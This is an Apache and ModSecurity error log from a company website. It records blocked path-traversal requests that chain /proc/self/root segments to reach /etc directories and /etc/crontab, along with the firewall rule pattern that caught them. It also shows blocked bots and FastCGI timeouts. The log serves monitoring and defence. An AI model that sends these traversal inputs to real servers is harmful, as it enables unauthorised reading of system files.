[Wed Mar 18 00:00:56.643831 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:59936] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboVaMdf6f5d65gmYZR49QAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:01:00.907564 2026] [:error] [pid 2598:tid 140411616036608] [client 74.7.243.128:35594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboVbBj0p0SRWAqcjGGzlgAAAw8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:01:19.121779 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:47912] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:01:24.711779 2026] [:error] [pid 2598:tid 140411691570944] [client 74.7.243.128:35594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboVhBj0p0SRWAqcjGGzowAAAwY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:01:28.778194 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:55168] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboViNY0UrI5A3LftIw3YgAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:01:39.095587 2026] [core:alert] [pid 17653:tid 140411607643904] [client 74.7.241.31:34242] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/sys/fs/cgroup/systemd/system.slice
[Wed Mar 18 00:01:41.107467 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48342] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:01:45.421147 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.128:55168] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboVmdY0UrI5A3LftIw3egAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:02:02.146029 2026] [proxy_fcgi:error] [pid 19507:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48864] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:02:11.308279 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:54616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboVs9a6ubjKNq_cu4Y-3gAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:02:24.125815 2026] [proxy_fcgi:error] [pid 15051:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:49394] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:02:46.125771 2026] [proxy_fcgi:error] [pid 19507:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:49900] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:03:08.142478 2026] [proxy_fcgi:error] [pid 11816:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:50408] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:03:13.274075 2026] [:error] [pid 15826:tid 140411725141760] [client 216.73.216.191:51588] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboV8eoXxyEfFpUF8f8WuQAAAUI"]
[Wed Mar 18 00:03:25.655124 2026] [mime_magic:error] [pid 16560:tid 140411582465792] (70014)End of file found: [client 74.7.241.31:41656] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/sys/fs/cgroup/systemd/system.slice
[Wed Mar 18 00:03:30.139155 2026] [proxy_fcgi:error] [pid 19507:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:50964] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:03:52.173813 2026] [proxy_fcgi:error] [pid 2598:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:51434] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:04:14.129780 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51966] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:04:36.133789 2026] [proxy_fcgi:error] [pid 31803:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52462] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:04:49.071627 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.244.43:38250] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboWUeyqAr6etmhZHNpgCwAAAFM"]
[Wed Mar 18 00:04:58.129840 2026] [proxy_fcgi:error] [pid 15826:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:53016] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:05:03.723997 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.228.61:56732] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboWXwkwaGbbGflqUZC9YQAAANY"]
[Wed Mar 18 00:05:10.858761 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:46702] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboWZta6ubjKNq_cu4Y_PAAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:05:20.152547 2026] [proxy_fcgi:error] [pid 19507:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:53406] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:05:24.536565 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:46702] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboWdNa6ubjKNq_cu4Y_QwAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:05:44.185817 2026] [proxy_fcgi:error] [pid 2598:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:53984] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:06:09.138061 2026] [proxy_fcgi:error] [pid 16560:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:54564] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:06:32.137972 2026] [proxy_fcgi:error] [pid 19507:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:55142] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:06:55.164369 2026] [proxy_fcgi:error] [pid 2598:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:55720] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:07:18.037853 2026] [proxy_fcgi:error] [pid 11816:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56284] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:07:30.571754 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:38772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboW8uoXxyEfFpUF8f8XYwAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:07:41.129815 2026] [proxy_fcgi:error] [pid 31803:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56822] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:08:04.141824 2026] [proxy_fcgi:error] [pid 11816:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57336] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:08:27.133795 2026] [proxy_fcgi:error] [pid 17653:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:58014] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:08:48.145814 2026] [proxy_fcgi:error] [pid 19507:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:58692] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:09:12.083615 2026] [proxy_fcgi:error] [pid 15826:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:59328] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:09:36.137785 2026] [proxy_fcgi:error] [pid 31803:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60064] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:09:50.539391 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.244.43:43550] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboXfsdf6f5d65gmYZR6TAAAAsw"]
[Wed Mar 18 00:09:57.181782 2026] [proxy_fcgi:error] [pid 16560:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:60660] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:10:00.651424 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:51552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboXiNa6ubjKNq_cu4Y_9gAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:10:05.386690 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.243.128:45020] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboXjew_le52K8_3pV2J3AAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:10:06.355401 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.228.61:54140] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboXjuoXxyEfFpUF8f8XswAAAU4"]
[Wed Mar 18 00:10:19.161846 2026] [proxy_fcgi:error] [pid 19507:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:33030] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:10:43.125799 2026] [proxy_fcgi:error] [pid 16560:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:33764] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:11:02.655194 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.243.128:45020] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboXxuw_le52K8_3pV2KFQAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:11:06.164809 2026] [proxy_fcgi:error] [pid 11816:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:34432] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:11:30.129791 2026] [proxy_fcgi:error] [pid 16560:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35140] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:11:46.208431 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.243.128:35932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboX8uw_le52K8_3pV2KTAAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:11:54.378738 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:35804] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:11:57.898454 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.243.128:58466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboX_SmAPhZkrhU8w4kbCAAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:12:17.141814 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:36388] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:12:39.141876 2026] [proxy_fcgi:error] [pid 2598:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37018] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:13:00.153793 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:37562] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:13:25.125861 2026] [proxy_fcgi:error] [pid 11816:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:38246] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:13:47.049937 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38876] AH01075: Error dispatching request to : (polling)
